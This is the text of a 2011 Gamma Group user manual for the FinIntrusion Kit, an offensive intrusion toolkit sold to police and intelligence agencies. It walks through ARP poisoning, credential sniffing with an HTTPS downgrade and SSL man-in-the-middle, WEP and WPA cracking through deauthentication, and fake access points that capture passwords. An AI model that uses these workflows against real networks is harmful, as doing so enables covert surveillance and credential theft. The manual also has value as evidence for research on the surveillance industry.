Release Information
Total Page:16
File Type:pdf, Size:1020Kb
Copyright 2011 by Gamma Group International, UK
Date 2011- 09-23
Release information
Version Date Author Remarks
1.0 2011-05- PK Initial version 26
1.1 2011-08- PK Review for release 2.1 12
1.2 2011-09- PK Review for release 2.2 23 Table of Content 1 OVERVIEW
The FinIntrusion Kit is a multi-purpose IT Intrusion kit that has been built specifically for nowadays operations by Law Enforcement and Intelligence Agencies. It can be utilized in a wide-range of operational scenarios like:
Breaking into- and monitoring Wireless and Wired Networks
Remotely breaking into E-Mail Accounts
Performing security assessments of Servers and Networks
The full capabilities are shown in several training courses, each focusing on different operational use-cases.
The following topics are covered within this document:
. Equipment . Installation . Configuration . Usage . Support 2 FININTRUSION KIT – TOOLSET
All the tools within the Backtrack system require advanced knowledge on basic techniques related to their purpose. Most tools have to be used on the command-line as they do not provide any graphical user interface.
The FinIntrusion Kit toolset is categorized into the following sub-categories:
. Network: Tools for Local Area Network (LAN) Intrusion
- Network Scanner discovers all Systems which are part of the same Local Area Network. - Network Scanner tries to identify Operating System and Hostname from Target PC. - Network Jammer prevents Internet Access for dedicated Systems. - Network Sniffer redirects Traffic in Local Area Network and logs Credentials from a Target PC. - MAC Change functions to spoof Hardware Address of a local Network Adapter.
. Wireless: Tools for Wireless Network- and Client Intrusion
- Wireless Scanner discovers Access Points and connected Wireless Clients from all Wireless Networks which could be reached with the Adapter (and Antenna). - Wireless Scanner discovers Wireless Clients which search for a known Wireless Network and emulate a “Fake” Access Point for these systems. - Hidden ESSID Identifier which starts attacks against specific Wireless Network to extract “Hidden ESSID”. - Wireless Jammer could be started against dedicated Wireless Clients or Access Point to re-route Target Systems over a “Fake” Access Point. - WEP Cracking against 40/64bit or 104/128bit protected Wireless Networks. - WPA Cracking against WPA-PSK or WPA2-PSK protected Wireless Networks. . Password: Password Generation Utilities
- Password Generator from specific Website. This Generator extracts Words from a specified Website and generates a unique Password List.
. Reporting:
- Export Function to save all results to “*.csv” files. - Generate Activity Log with all Status and Result Messages. 3 EQUIPMENT The kit includes a range of equipment for various local and remote IT Intrusion scenarios. Some usage examples are supplied within the following chapters.
Overview of Equipment
3.1 Notebook The notebook is the core of the kit. It is loaded with the BackTrack operating system and the FinIntrusion Kit software.
3.2 USB Hard-Disk The external USB Hard-Disk contains various data to help with certain attacks, for example:
Rainbow Tables for LM/WPA /MD5 Default Password List Wordlists for various languages and subjects
It can also be utilized as a storage device for gathered information.
3.3 Wireless Equipment The included Wireless (802.11) and Bluetooth equipment can be used for short- and long-distance attacks against wireless networks/clients and Bluetooth-enabled devices.
Wireless examples:
Scanning for Wireless Networks and Clients Breaking WEP/WPA/WPA2 Encryption Emulating an Access-Point for Client-Side attacks Monitoring Wireless LAN Traffic
Bluetooth examples:
Scanning for Bluetooth Devices Executing known attacks like Bluesnarf, Bluebug and more 4 OPERATING SYSTEM
4.1 Introduction The FinIntrusion Kit is shipped with a copy of BackTrack 5, an operating system that is based on Linux and includes a complete set of up-to-date IT intrusion and analysis tools.
BackTrack operating system is used by numerous professional IT security companies world-wide.
4.2 Notebook Usage Turn on the notebook and boot with the default settings. After the Backtrack graphical user interface (GDM) is loaded, it is ready to use.
The system can be customized using the programs included in the menu. 5 INSTALLATION
5.1 Pre requirements:
BackTrack 5 – R1 - 32bit operating system
Gnome desktop version
Following packages have to be installed before you can use FinIntrusion Kit:
Mono-runtime
Gtk-sharp2
Dhcp3-server
Whois
To install the software on the FinIntrusion Kit follow these steps:
1. Insert CD-Rom and open the folder FinIntrusion Kit
2. Click on the file “finintrusionkit_installer_v_XXX .ggi”
3. A shortcut for launching FinIntrusion Kit now appears on the desktop (/root/Desktop/FinIntrusionKit .desktop) 5.2 License Place the license “.ggpck” – file on a USB dongle or CD-ROM:
1. Mount USB-Stick or CD/DVD
CD-ROM:
# sudo mount /media/cdrom0
USB-Stick:
# sudo mount /dev/sdb1 /mnt/
2. Copy license file to /tmp
CD-ROM:
# cp /media/cdrom0/CERTS- FinIntrusion-Kit-Customer_ID-Machine_ID-XX.DAYS.ggpck /tmp/
USB-Stick:
# cp /mnt/CERTS- FinIntrusion-Kit-Customer_ID-Machine_ID-XX.DAYS.ggpck /tmp/ 3. Start FinIntrusion Kit and press button “import License”.
4. Choose your *.ggpck file and press button “import”. 5. After import the license will be checked.
6. If the license is valid, close the dialog. 7. Restart the FinIntrusion Kit Application. 5.3 Update Software The FinIntrusion Kit software is updated regularly to meet the requirements within the ever-changing IT.
FinIntrusion Kit is equipped with the option of downloading such software updates. It can be configured to automatically check for updates at certain intervals or the user can check straight away for an update.
Update checks can be configured to run every time the application starts or in various periods of time. If an update was found, it will show the following dialogue including the automatic installation of the updated software.
After the installation of an update the user can verify that the new version has been installed by checking the version number in the About box. 6 CONFIGURATION
6.1 Network Configuration The user can select the proper Network Adapter by choosing it from the “Interface:” combo box.
For Network Intrusion it is necessary that FinIntrusion Kit is running in the same network as the target system.
If the network adapter has no IP address, press button to get a new IP Address via DHCP.
The user can select the proper Network Interface by choosing it from the “Interface:” combo box.
In order to proceed with the Network Intrusion, click the tab
button. 1.1 Wireless Configuration The user can select the proper Wireless Adapter by choosing it from the “Interface:” combo box. To attack a target system which is connected through a wireless network it is necessary to be in the same wireless network.
To configure a wireless adapter for a specific wireless network we recommend using “Wicd Network Manager”.
Start “Wicd”, change Preferences and add Wireless Interface e.g. “wlan0” .
Press “Refresh” Button and select a Wireless Network (SSID Broadcasting should be activated!). Press “Connect” Button to configure all necessary parameter for the selected Wireless Network. 1.1 Language Options The application is translated in a number of languages and the user has the option of choosing one.
Click on “Language” in the main menu on the left side.
After choosing a different language the application has to be restarted so that the changes are effective. 7 FININTRUSION KIT – NETWORK INTRUSION
7.1 Target Identification To monitor or jam a Target system it is necessary to detect the system inside the (W)LAN. This feature is provided by the “Network Scanner” and can be started with the
button.
All Systems inside a network will be listed. By default a class C will be scanned (e.g. 10.0.0.0/24 or 10.0.0.1 – 10.0.0.254). The target must be in the same network where the FinIntrusion Kit runs.
Work flow:
1. ARP Scan captures all MAC Addresses for connected Targets.
2. Try to identify Operating System with OS Fingerprinting technique.
3. Try to identify Hostname.
OS System Scan can trigger an AV Detection / Warning and is not working against all Target systems.Jam Target “Network Jammer” blocks a Target of having Internet access.
“Network Jammer” initiates an „ARP Cache Poisoning“Attack against Target PC and overwrites MAC Address from Default Gateway with an invalid value.
The “Network Jammer” runs in the background as long as the FinIntrusion Kit is started or the button was pressed. 7.2 Monitor Target “Network Sniffer” can be used to extract all usernames and passwords of known protocols from the network traffic.
Select to start parsing the traffic and printing all account data it finds.
FinIntrusion Kit includes three different types of Monitoring Modes. Default Mode is: “HTTPS Emulation”
Mode Protocols Mode Protocols Mode Protocols (Examples) DEFAULT MODE (Examples) (Examples) „Non“ SSL Mode = SMTP “HTTPS Emulation” = SMTP SSL Mode = SMTP & SMTPS Capture Credentials Pop3 Capture Credentials Pop3 Capture Pop3 & Pop3s which were Imap which were Imap Credentials which Imap & Imaps transmitted in Telnet transmitted in Telnet were transmitted Telnet CLEARTEXT SNMP CLEARTEXT and try to SNMP in CLEARTEXT and SNMP HTTP redirect HTTPS à HTTP & HTTPS „encrypted“ with HTTP & HTTPS FTP HTTP (Redirect) SSL FTP ... FTP ...... Note: Enabling “SSL Man-in-the-Middle” option will result in all clients seeing a warning that the SSL/TLS certificate for their servers has changed. This includes all SSL sessions (Web, E-Mail, etc.). This also happens if HTTPS HTTP redirect is not working!
7.2.1 PCAP Recorder This feature can be used to record all data from a selected Target System into a PCAP File.
This file could be analyzed with different Network Analyze (e.g. Wireshark) or useful as a piece of evidence.
FinIntrusion Kit supports two different types of PCAP Recorder.
Mode Protocols (Examples) Mode Protocols (Examples)
„tcpdump“ Generate a Network Capture File „Wireshark“ Start Wireshark in the (= pcap file) with „tcpdump“ in the foreground with a capture background. A capture Filter for filter for selected Target IP selected IP will be used. No Traffic (= selected row). Analyzer will be started. Capture File must be Generate a File: saved at the end of the „/tmp/fik_pcap_recorder_IP- session!!! ADDRESS.pcap“
Note: PCAP Recorder could be combined with all three different types of Monitoring Mode. 7.2.2 Open URL in Browser Select a FTP, HTTP or HTTPS logged credentials and a special option will be activated in the submenu (“Open URL in Browser”). This feature is useful to verify if the credentials are correct.
Note: The URL / Hostname could be different from URL, which will be typically used for the authentication process (Forwarding, Load Balancer, etc.). For a FTP Accounts the credentials (= username and password) will be used automatically. 8 FININTRUSION KIT – WIRELESS INTRUSION For all wireless based attacks, the Alfa USB adapter should be used as its functionality and drivers provided the best support for the applied Wireless Intrusion techniques.
After the Alfa USB adapter is plugged into the notebook via the provided USB cable, it will be recognized automatically. If the interface isn’t listed, try to reconnect the adapter and press button.
8.1 Wireless Network Identification All Wireless Network Intrusion functions are blocked until a Wireless Network was found. “Wireless Network Intrusion” Submenu
Press button to scan for wireless networks within the range of the FinIntrusion Kit system and display them including detailed information.
The following information is displayed for discovered networks:
. SSID Name of Access-Point / Wireless Network
. BSSID MAC address of Access- Point
. Channel Used Frequency / Channel
. Encryption Type of Encryption OPEN/WEP/WPA/WPA2
. Key After Decryption Example of “Wireless Network Scan” Select an Access Point and a list of “Connected Clients” for this AP will be shown below.
8.2 Identify hidden ESSID FinIntrusion Kit includes a module to identify a hidden ESSID. For this module it is necessary to have at least one connected client for the selected Access Point.
An ESSID is necessary for WPA Cracking and to setup a Fake AP for a specific ESSID. 8.3 Jam Wireless Network To block all clients, which are connected to a specific Access Point or only one dedicated Wireless Client use the “Wireless Jammer” Module.
Example of “Wireless Jammer” was started.
“Wireless Jammer” sends out de-authentication packages to the Wireless Client(s).
Note: If a specific Connected Wireless is selected (before!) WLAN Jammer was started, only this Wireless Client will be blocked. If no “Connected Wireless Client” is selected, all Wireless Clients will be blocked.
The package counter for Wireless Jammer could be modified in (default value = 10 packages): “/usr/local/finintrusionkit/conf/FinIntrusionKit.cfg”
8.4 Break Encryption FinIntrusion Kit includes a module to break the WEP and WPA/WPA2 (PSK mode) encryption. For this module it is necessary to have at least one connected Wireless Client.
In case a wireless network is encrypted using the WEP or WPA/WPA2 technology, select the encrypted network and press button.
The software will now try to automatically retrieve the WEP encryption or WPA/WPA pre-share key, which then can be used to join the network. 8.4.1 WEP Cracking
Example of a successful “WEP Crack”
This process should not take longer than 10 minutes. In case it cannot recover the key, try to restart the process. As this technique cannot work on all types of wireless networks, this might need to be done in a manual process.
Work flow:
1. Identify a WEP encrypted Wireless Network with minimum one connected Wireless Client.
2. The connected Wireless Client will be disconnected with de-authentication packages.
3. Target System reconnects to Access Point these packages will be captured in the background.
4. Start a replay attack and replay these fragments. 5. Access Point / Wireless Clients will be triggered to send more packets more encrypted Data packets / IVs will be captured.
6. If enough IVs are collected a WEP Crack could be successful.
Depending on the size of WEP key and if ASCII or HEX values were used, a different amount of packages must be captured.
Key Length Encrypted Data Packages with different IVs 40 / 64 Bit ASCII ~ 30.000 Packages 40 / 64 Bit HEX ~ 40.000 Packages 104 / 128 Bit ASCII ~ 60.000 Packages 104 / 128 Bit HEX ~ 70.000 Packages 8.4.2 WPA/WPA2-PSK
Example of a successful “WEP Crack”
To try to recover a “WPA/WPA2” PSK (=PreShared Key) it is necessary to capture a 4- way Handshake. This handshake will only be done if a Wireless Client connects to a Wireless Network. If this process is passed, the Handshake wouldn’t be send by the Wireless Client anymore (until the next disconnect). To trigger this handshake it is necessary to do an active attack and disconnect a Wireless Client with some de- authentication packages.
Work flow:
1. Disconnect an established Wireless Client Access Point connection (with de- authentication packages)
2. Wireless Client tries to reconnect to the Access Point and pass 4-way handshake.
3. FinIntrusion Kit starts a Wordlist Attack against selected Access Point. On Backtrack exist a password list at the location: “/pentest/passwords/wordlists/”
WPA Cracking Option Dialog Box 8.5 Wireless Client Identification All Wireless Client Intrusion functions are blocked until a Wireless Network was found.
“Wireless Client Intrusion” Submenu
Press the button to scan for wireless clients within the range of the FinIntrusion Kit system and display them including detailed information.
The following information is displayed for discovered networks:
. Client MAC MAC Address Wireless Adapter of Target Client
. Vendor . Translated „Organizationally Unique Identifier“ (OUI) = uniquely identifies a vendor / manufacturer
. BSSID MAC Address of Access Point (if associated!)
. Probed ESSID Names of previous used Wireless Networks, which Wireless Client is searching for. 8.6 Fake / Rogue Access Point For this attack, the software emulates a fake Access Point which Wireless clients can find and connect to. This is a very useful attack to get access to targets network traffic and gain the position to attack their system.
Example of “Fake AP” was started
Two different types of Modes exist:
- Reply to all Broadcasts
- Reply to specific ESSID 8.6.1 Adapter Selection If a client gets connected and cannot access the internet, no valuable traffic will be created from his side and therefore no essential data can be gathered from monitoring it.
To redirect all traffic from the target wireless stations FinIntrusion Kit system needs an internet connection/uplink.
Using this technique, clients will assign normally to the Access Point and use the internet as they normally do when using public hotspots.
Fake AP - Adapter could only be Wireless Adapter. On this adapter a “Fake Access Point” will be started.
Uplink - Adapter is any other adapter, than “Fake AP – Adapter”, which has the Status “UP”!!! This Interface will be used to provide Internet Access for all connected Wireless Clients. Typically a “cable network interface” should be used in this case.
8.6.2 Reply-to and broadcast all seen ESSID’s:
In this mode, the software see’s all requests for Wireless LAN’s by systems and replies to all of them so the scanning systems connect to the emulated access point. This is very useful as especially Windows systems always scan for recently used Wireless networks (e.g. hotel/hotspot networks).
ESSID text field is deactivated. Gamma doesn’t recommend this Mode. If a Target Subject was previously connected e.g. “My Home Network” / “Hotel XYZ” / “Airport XYZ” and will be connect to an Access Point with the same “Network Name” it could be conspicuous (only if the Person is NOT in this environment anymore!). 8.6.3 Emulate access-point only for ESSID
This feature will emulate a normal access-point which the target systems see when scanning for wireless networks. The chosen ESSID can trick people into selecting and associating to this network.
8.6.4 “Monitor all” Button A passive Network sniffer will be started in the background. Features are:
- Capture all credentials from Wireless Clients which are connected to your Fake Access Point. - Traffic from all Wireless Clients will be captured, no single Target selection is necessary. - All Cleartext Passwords like FTP, IRC, SNMP, etc. will be captured (same like Non-SSL Mode in the network section) - A HTTPS HTTP Emulation will be started automatically in the background, as long as it is supported by the Target Webpage.
Press the button to stop the Fake-AP and Monitor function. 9 PASSWORD GENERATOR UTILS The “Website Profiling” module can be used to crawl a website, extract all words and export it to a password list. This specific password list could speed up a Brute Force Attack against a well know Target (e.g. web based Forum, Email Account etc.).
Example of “Wordlist” generated from webpage “www.finfisher.com”:
Work flow:
1. A Webcrawler will be started. This Crawler mirrors max. 500 different Webpages from a Webserver and save it in “/tmp” – directory.
2. A Webparser will extract all Words and save it to a text file: “/tmp/WEBSITE.txt”
3. All Words will be imported into GUI and duplicates will be removed.
Note: Words which are longer than 33 characters will be ignored. 9.1 Limitations The „Website Profiling“ module has some limitations:
Only Webpages in HTML are support. Other Sourcecode (e.g. ASP, JS) could generate some unusable Words (e.g. Methods or Variable Names).
Only Webpages without Pre-authentication, Session-Cookie etc. could be analyzed.
No Proxy Authentication is supported.
Wordlist must be cleaned up manually. (Remove Nonsense / unlike used Words, like Methods or Variable Name etc.) 10 FININTRUSION KIT – OTHER OPTIONS FinIntrusion Kit provides some additional functions, which are available if a dedicated target PC or user credential is selected. User should select a row (left mouse key) and press right mouse key to get a submenu.
Submenu of “Network Scan” Submenu of “Wireless Scan”
10.1.1 Delete / Delete all Delete selected row or all entries in the list.
10.1.2 Data Export Save all data tab separated into an external text file. This file could be analyzed e.g. with Excel. Example of Target List loaded with Excel 11 ACTIVITY LOG For legal reasons, FININTRUSION KIT records all actions that have been executed with a time stamp. The action log can be exported into a regular TXT / CSV file.
Example of Wireless Activity Log: 12 SUPPORT All customers have access to an after-sales website that gives the customers the following capabilities:
Download product information (Latest user manuals, specifications, training slides)
Access change-log and roadmap for products
Report bugs and submit feature requests
Inspect frequently asked questions (FAQ)
The after-sales website can be found at
https://www.gamma-international.de
o Username:
o Password: